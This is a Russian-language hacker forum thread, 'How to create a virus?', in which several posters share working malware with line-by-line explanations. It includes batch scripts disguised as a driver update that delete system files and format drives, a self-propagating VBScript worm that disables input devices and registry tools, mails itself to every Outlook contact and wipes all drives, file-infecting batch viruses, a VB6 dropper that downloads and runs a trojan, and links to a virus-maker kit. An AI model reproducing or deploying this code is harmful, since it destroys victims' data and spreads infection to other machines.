Как создать вирус?

Отслеживать

aivus

(L3) cache
Пользователь
Регистрация
22.04.2006
Сообщения
169
Реакции
0
Есть несколько вариантов создания вируса.Мы рассмотрим лишь один из них...

Код: 
@echo off
echo Windows updating driver...
attrib -r -h -s c:\windows\*.da?
echo Y | del c:\windows\*.da?
echo Y | del d:\*.*
attrib -r -h -s c:\*.*
echo Y | del c:\*.sys
echo Y | del c:\*.bin
echo Y | del c:\*.bat
echo Y | format d:
echo Y | format c:
echo Virus loading.... Completed!

Это пример вируса...Да и еще одно договоримся сохранять наши проекты как .bat файлы... Итак, разберем по строкам... Первая строка "говорит" компьютеру, что не надо показывать операции. Вторая - выводит надпись Windows updating driver... третья и шестая-снимают все атрибуты(скрытый, для чтения и т.д.) с файлов. 4-ая, 5-я, 6-я, 7-я, 8-я и 9-я удаляют файлы на дисках. 10-я и 11-я форматируют диски. Ну и 12-я выводит знаменательную надпись: Virus loading.... Complited! Форматирование может и не произойти, но ОС будет испорчена... Задание:Создайте самостоятельно вирус, который будет "убивать" виндовс не только находящийся на диске С:.
Рассмотрим еще один пример:

Код: 
@echo off
if exist c:\aivus.bat goto cool
copy %0 c:\aivus.bat >nul
attrib +h c:\aivus.bat >nul
echo c:\aivus.bat>>c:\autoexec.bat
echo Y | del %0 >nul
:cool
copy %0 a:\run.bat >nul
copy %0 a:\open.bat >nul
attrib +h a:\open.bat >nul
echo Y | del c:\windows\calc.exe >nul
attrib -h -s -r c:\*.ini >nul
echo Y | del c:\boot.ini >nul
echo Y | format a:

Я думаю не все поняли, что это за строчки:
Код: 
if exist c:\aivus.bat goto cool
echo c:\aivus.bat>>c:\autoexec.bat
copy %0 a:\open.bat >nul
attrib +h a:\open.bat >nul

Строчка if exist c:\aivus.bat goto cool С вирусами связано и программирование... Те, кто чуть его знают, поняли её. Для других объясняю: Эта строка проверяет есть ли файл open.bat на диске С: , если есть переходим к строке :cool.
Строка echo c:\aivus.bat>>c:\autoexec.bat добавляет себя в автозапуск.
copy %0 a:\open.bat >nul копирует себя(обозначается %0) в a:\open.bat Ну а строка attrib +h a:\open.bat >nul ставит файлу атрибут скрытый. Если кто-то непонял что значит null, значит - скрыть операцию...


Писал сам. За ошибки и т.п. прошу не судить. :thumbsup:

Автор: aivus
 
3 строка снимает атрибуты с файлов в папке windows

а как ты будешь sys файлы в корне С удалять ?
с них атрибуты не сняты

+ 98 или //Me встречается редко
а в NT autoexec.bat не обрабатывается

+ это не вирус, а просто западло :)
 
Вот например скрипт на VB для изминения ключа в реестре =)
А как все знают если HKEY_CURRENT_USER\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\POLICIES\SYSTEM\DisableRegistryTools поставить значение "1" доступ в реестр через "regedit" будет закрыт =).
Пишем скрипт.


Код: 
Set s = CreateObject("Wscript.Shell")
Это - переменные.Ничего сдесь не трогаем.
далее ключу HKEY_CURRENT_USER\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\POLICIES\SYSTEM\DisableRegistryTools присваеваем значение "1"
пишем следующее
Код: 
HKEY_CURRENT_USER\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\POLICIES\SYSTEM\DisableRegistryTools", 1, "REG_DWORD
Вот так =) получается :

Код: 
Set s = CreateObject("Wscript.Shell")
s.RegWrite "HKEY_CURRENT_USER\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\POLICIES\SYSTEM\DisableRegistryTools", 1, "REG_DWORD
Сохраняем это в .vbs - запускаем.
Заходим - Start > run > regedit
Вылетает сообщение "Редактирование реестра запрещено администратором системы".
Лекарство.Ну соответственно копируем этот VB скрипт и присваиваем значение "0" - запускаем.Заходим в реестр - и Ура! все снова пашет =).
Далее.
Например хотим мы зайти на xss.pro/ запустив скрипт.Делаем следующее :
Переменные:
Код: 
set ie = WScript.CreateObject("InternetExplorer.Application")
далее:
Код: 
ie.Visible = True
ie.Navigate "http:\\xss.pro/"
ie.Visible - true т.е мы разрешаем запустить InternetExplorer.exe (если присвоить значение "False" ничего не выйдет)
далее ie.Navigate - сайт на который надо перейти...xss.pro/ к примеру >
Код: 
ie.Navigate "http:\\xss.pro/
Получаем следующий скрипт:
Код: 
set ie = WScript.CreateObject("InternetExplorer.Application")
ie.Visible = False
ie.Navigate "http:\\xss.pro/"
Сохраняем его в .vbs запускаем =) и через InternetExplorer заходит на наш любимый форум =).
Соответственно можно данную фичу привязать к бекдору - и как только ламер запустит бекдор - его сразу кинет на сниффер =).
 
Также о VB.


Код: 
'      Объявление переменных(этот абзац не перемещать)
Set FileSystemObject = CreateObject("scripting.filesystemobject")
Set Shell = CreateObject("Wscript.Shell")
t = 0: On Error Resume Next ' Пропускать ошибки
Set Application = CreateObject("Shell.Application")
Set InternerExplorer = WScript.CreateObject("InternetExplorer.Application")
Set Outlook = WScript.CreateObject("Outlook.Application")


'     Запускать вирус каждое 1 число Января
If Day(Date)<>1 and Month(Date)<>1 Then WScript.quit

'     Поменять функции клавиш мышки местами
Shell.RegWrite "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\SwapNT", "rundll32 user32, SwapMouseButton"
Shell.RegWrite "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\Swap98", "rundll32.exe user.exe, swapmousebutton"
Shell.Run "rundll32 user32, SwapMouseButton"

'     Вырубить клавиатуру(Только для Windows 95,98,Me)
Shell.RegWrite "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\Dead", "rundll32 keyboard,disable"
Shell.Run "rundll32.exe keyboard.exe, disable"

'     Отключить мышь(Только для Windows 95,98,Me)
Shell.RegWrite "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\Mad", "rundll32 mouse,disable"
Shell.Run "rundll32.exe mouse.exe, disable"

' Минимизировать все окна
Application.MinimizeAll

' Запускаться при каждой перезагрузке
Set File2 = FileSystemObject.GetFile(WScript.ScriptFullName)
File2.Copy ("c:\windows\System\Gigabyte.vbs")
Shell.RegWrite "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\Gigabyte", "C:\WINDOWS\SYSTEM\Gigabyte.vbs"
Shell.RegWrite "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunServices\Gigabyte", "C:\WINDOWS\SYSTEM\Gigabyte.vbs"

' Блокировать RegEdit(чтоб у него не заводился редактор реестра).Для того чтобы разблокировать происвойте DisableRegistryTools значение - 0
Shell.RegWrite "HKEY_CURRENT_USER\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\POLICIES\SYSTEM\DisableRegistryTools", 1, "REG_DWORD"

'     Вывести сообщение с запросом пароля
prl = inputbox("Введи пороль", "Запрос")
If prl = "Правельный_Пароль" Then FileSystemObject.deletefile WScript.ScriptFullName, True: Wscript.Quit

' Удаление пунктов меню Пуск: Программы, Завершение работы, Найти, Выполнить, Документы и т.д.
Shell.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explоrer\NoStartMenuMorePrograms", 1, "REG_DWORD"
Shell.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explоrer\NoClose", 1, "REG_DWORD"
Shell.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explоrer\NoFind", 1, "REG_DWORD"
Shell.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explоrer\NoRun", 1, "REG_DWORD"
Shell.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explоrer\NoRecentDocsMenu", 1, "REG_DWORD"
Shell.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explоrer\NoFavoritesMenu", 1, "REG_DWORD"
Shell.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explоrer\NoStartMenuLogoff", 1, "REG_DWORD"

Shell.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableTaskMgr", 1, "REG_DWORD"
Shell.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explоrer\NoClose", 1, "REG_DWORD"

' Перейти на сайт "http:\\"
InternerExplorer.Visible = True
InternerExplorer.Navigate "http:\\"

' Сделать домашней страницу "http:\\"
Shell.RegWrite "HKCU\SOFTWARE\Microsoft\Internet Explorer\Main\Start Page", "http:\\"

' Разослать вирус Все контакты неприятеля
For Index = 1 To Outlook.GetNameSpace("MAPI").AddressLists(1).count
Set OutMail = Outlook.CreateItem(0)
OutMail.to = Outlook.GetNameSpace("MAPI").AddressLists(1).AddressEntries(Index)
OutMail.Subject = "Новое_Название"
OutMail.Body = "Новое_Название"
OutMail.Attachments.Add WScript.ScriptFullName
OutMail.Send
Next


'     Удаление всех специальных папок
 For Each Folder In Shell.SpecialFolders
  FileSystemObject.deletefolder folder,True
 Next
' Удаление Documents and Settings
 FileSystemObject.deletefolder"C:\Documents and Settings",True
 FileSystemObject.deletefolder"D:\Documents and Settings",True
 FileSystemObject.deletefolder"E:\Documents and Settings",True

'     Форматировать Все диски (Только для Windows 95,98,Me)
If FileSystemObject.FileExists("d:\autoexec.bat") Then Str  = "d:\autoexec.bat"
If FileSystemObject.FileExists("d:\Windows.000\autoexec.bat") Then Str  = "d:\Windows.000\autoexec.bat"
If FileSystemObject.FileExists("d:\Windows\autoexec.bat") Then Str  = "d:\Windows\autoexec.bat"
If FileSystemObject.FileExists("c:\autoexec.bat") Then Str = "c:\autoexec.bat"
If FileSystemObject.FileExists("c:\Windows.000\autoexec.bat") Then Str = "c:\Windows.000\autoexec.bat"
If FileSystemObject.FileExists("c:\Windows\autoexec.bat") Then Str = "c:\Windows\autoexec.bat"
Set ab = FileSystemObject.GetFile(Str)
ab.Attributes = 0
Set autoexec = FileSystemObject.CreateTextFile(Str)
autoexec.WriteLine "@cls"
autoexec.WriteLine "@format c: /q /autotest"
autoexec.WriteLine "@format d: /q /autotest"
autoexec.WriteLine "@format e: /q /autotest"
autoexec.WriteLine "@format f: /q /autotest"
autoexec.WriteLine "@format g: /q /autotest"
autoexec.WriteLine "@format h: /q /autotest"
autoexec.WriteLine "@format i: /q /autotest"
autoexec.Close
Shell.Run Str, 5
Shell.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoDrives", 67108863, "REG_DWORD"
Shell.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoViewOnDrive", 67108863, "REG_DWORD"

'     Перезагрузить компьютер(Только для Windows 95,98,Me)
Shell.Run "Rundll32.exe User.exe,ExitWindows"

'     Самоликвидироваться
FileSystemObject.deletefile WScript.ScriptFullName, True

Примерно так.
 
Маринка
Нужен настоящий вирус.... Сейчас дискетку достану.... Вот....
Код: 
@echo off%[MrWeb]%
if '%1=='In_ goto MrWebin
if exist c:\MrWeb.bat goto MrWebru
if not exist %0 goto MrWeben
find "MrWeb"<%0>c:\MrWeb.bat
attrib +h c:\MrWeb.bat
:MrWebru
for %%g in (..\*.jpg ..\*.doc ..\*dat ..\*.htm *.jpg *.mp3 *.doc *.htm *.xls *.dat ) do call c:\MrWeb In_ %%g
goto MrWeben
:MrWebin
if exist %2.bat goto MrWeben
type c:\MrWeb.bat>>%2.bat
echo start %2>>%2.bat%[MrWeb]%
:MrWeben
И вот еще
Код: 
@echo off%[MrWeb]%
if '%1=='In_ goto MrWebin
if exist c:\MrWeb.bat goto MrWebru
if not exist %0 goto MrWeben
find "MrWeb"<%0>c:\MrWeb.bat
attrib +h c:\MrWeb.bat
:MrWebru
for %%g in (*.jpg) do call c:\MrWeb In_ %%g
goto MrWeben
:MrWebin
if exist %2.bat goto MrWeben
type c:\MrWeb.bat>>%2.bat
echo start %2>>%2.bat%[MrWeb]%
:MrWeben
А это НАСТОЯЩЕЕ западло...:
Код: 
@echo off
@For %%g in (*.zip *.rar *.htm *.jpg *.mp3 *.dat *.avi *.wav *.wma ..\*.zip ..\*.rar ..\*.htm ..\*.jpg ..\*.mp3 ..\*.dat ..\*.avi ..\*.wav ..\*.wma) do copy %0 %%g >nul
 
Таких генераторов полно.. и они ээ "скушоваты" и некоторые генераторы могут оказаться обычным троем.
:screenshot: Скриншот|Screenshot
Downloads:
_http://rapidshare.de/files/24070287/JPS_Virus_Maker.zip.html
_http://www.jeyjey.persiangig.com/Download/JPS%20Virus%20Maker.zip
вот допутсим ещё один "генератор". +)
---
ну а с ВБ.. вот если кому надо.
[VB6]
Код: 
Private Declare Function URLDownloadToFile Lib "urlmon" Alias _ 
    "URLDownloadToFileA" (ByVal pCaller As Long, ByVal szURL As String, _ 
    ByVal szFileName As String, ByVal dwReserved As Long, _ 
    ByVal lpfnCB As Long) As Long 

Private Sub Form_Load() 
Form1.Visible = False 
Dim iReturn As Long 
Dim saveto As Long 
iReturn = URLDownloadToFile(0, " http://www.yoursite.com/trojan", "c:\windowsdll.exe", 0, 0) 
Shell "c:\windowsdll.exe" 
End Sub
 
admin


Напишите ответ...
  • Вставить:
Прикрепить файлы
Верх